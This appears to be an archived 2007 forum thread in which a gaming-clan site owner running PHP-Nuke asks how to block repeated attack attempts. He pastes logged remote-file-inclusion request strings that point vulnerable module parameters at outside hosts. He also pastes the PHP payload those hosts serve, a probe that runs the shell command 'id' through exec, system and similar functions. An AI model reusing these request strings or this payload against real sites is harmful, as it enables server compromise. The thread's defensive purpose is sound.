...

View Full Version : Site under attack - Get posts



darthanian
11-11-2007, 06:48 PM
I'm relatively new to website and php. I run a website for my gaming community- www.clanpraetorian.net.

I have PHP nuke running on the site with nuke sentinel. All updated etc..
and sentinel keeps blocking this ip and access here is what line is being blocked. so far I've banned/blocked 1055 of his attempts.

Get String: www.clanpraetorian.net/modules.php?name=vwar&file=war//modules/vwar/admin/admin.php?vwar_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt?

Query String: www.clanpraetorian.net/modules.php?name=vwar&file=war//modules/vwar/admin/admin.php?vwar_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt?

Post String: www.clanpraetorian.net/modules.php

That particular one comes up Germany

It's pretty obvious to me he's trying to activate this txt file for sql injection? He got me once already but i fixed the problem and he can't mess with the files. my question is how can i block the get string? or should i? I can't block his ip he's either using a proxy or moving around countries very fast :) . What i think i need is something in the htaccess file maybe?

Thanks for any help

Heres a couple of other blocks
Get String: www.clanpraetorian.net/modules.php?name=SQuery/SQuery/lib/gore.php?libpath=http://theninjalegion.com/safeon.txt??
Get String: www.clanpraetorian.net/modules.php?name=vwar//modules/vwar/admin/admin.php?vwar_root=http://65.102.222.93/safeon.txt?
Get String: www.clanpraetorian.net/modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kolortavil.org/Connections/ok.txt?

Here is txt file he is using for one site... http://www.kolortavil.org/Connections/ok.txt?

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

Apostropartheid
11-11-2007, 07:09 PM
All your links redirect to the FBI's website...?

darthanian
11-11-2007, 07:34 PM
no, lol

Thats nuke sentinel blocking you. Fixed.. but it'll just ban you.

Spookster
11-11-2007, 07:51 PM
Have you checked PHPNukes site for updates/patches?

darthanian
11-11-2007, 08:08 PM
I have PHP nuke running on the site with nuke sentinel. All updated etc..

:thumbsup:

darthanian
11-14-2007, 05:21 AM
No more ideas?



EZ Archive Ads Plugin for vBulletin Copyright 2006 Computer Help Forum